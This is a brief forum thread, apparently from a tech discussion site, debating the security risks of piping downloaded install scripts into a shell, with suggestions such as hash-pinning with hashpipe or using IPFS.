[hbz]

One of the biggest complaints about the curl - bash paradigm are the security implications. URLs can point to different content at different times. Project maintainers can (and have) changed the content at these URLs for malicious or other reasons. A lot of people will not examine the source of what they're piping into the shell.

To me, https://github.com/jbenet/hashpipe addresses a lot of these issues by pinning the content to a hash.

You can't force somebody to read and understand the install script, but at least those who do can know it's the one they verified in advance.

[kordless]

Just use IPFS: https://gateway.ipfs.io/ipfs/QmTeW79w7QQ6Npa3b1d5tANreCDxF2i...

[robinson-wall]

There's also the fact that it's easy to display something in the browser other than what is pasted into the terminal[1]. That said, if you say "just run apt-get install foo" people will just copy that instead of the curl command.

1: http://thejh.net/misc/website-terminal-copy-paste

[kovetskiy]

Kubernetes uses this way, so why not?

[hbz]

Because it's lazy and insecure?